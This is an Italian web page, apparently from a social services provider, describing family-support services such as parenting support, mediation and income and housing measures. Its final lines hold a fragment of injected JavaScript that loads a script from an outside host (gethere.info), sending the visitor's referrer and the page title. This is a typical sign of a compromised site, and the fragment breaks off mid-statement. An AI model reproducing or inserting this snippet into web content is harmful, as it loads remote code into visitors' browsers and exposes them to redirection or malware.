Famiglia

I servizi che offriamo sono:


 

Il concetto di “famiglia” ha subito nel corso del XX secolo profonde trasformazioni; le famiglie dovrebbero essere maggiormente poste all’attenzione delle politiche sociali; su di esse ricadono gli effetti di ogni fenomeno che investe la società, dalla crisi economica che produce disoccupazione e contrazione dei redditi da lavoro, al mutamento dei rapporti sociali e della struttura familiare tradizionali, all’impatto con gruppi etnici e culture differenti dalla nostra o ancora all’evoluzione tecnologica che modifica i contesti e le modalità del lavoro come pure la fruizione del tempo libero.

Dalla “buona salute” delle famiglie dipende non solo quella dei minori ma dell’intera comunità, pertanto sono fondamentali politiche di promozione e tutela delle famiglie e a sostegno della genitorialità (parliamo ad esempio di azioni di sostegno al reddito, di politiche abitative, di interventi assistenziali ed educativi per minori, di misure di conciliazione, di gruppi di auto mutuo aiuto, di servizi di mediazione familiare in caso di separazione, divorzio o situazioni familiari di conflitto).

E’ importante quindi offrire alle famiglie servizi caratterizzati da elevati ed omogenei standard qualitativi, mediante il consolidamento e il potenziamento degli interventi già attivi, con la finalità di promuoverne il generale benessere.

E’ necessario mettere in atto forme di sostegno alla genitorialità aperte e flessibili, articolate su bisogni diversi. In tutto ciò a nostro avviso è necessario valorizzare il ruolo educativo e sociale delle famiglie nella loro accezione più ampia, sostenere i genitori in difficoltà, arricchire la rete dei servizi socio-educativi territoriali con una struttura più aperta e a disposizione dei cittadini.

In quest’ambito, quindi, offrire servizi innovativi, secondo noi, vuol dire proporre modalità innovative che per loro flessibilità e informalità sanno adattarsi alle diverse esigenze delle diverse tipologie familiari, offre soluzioni e interventi ad hoc individualizzati e personalizzati, sostenere genitori e figli.

 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if (document.currentScript) {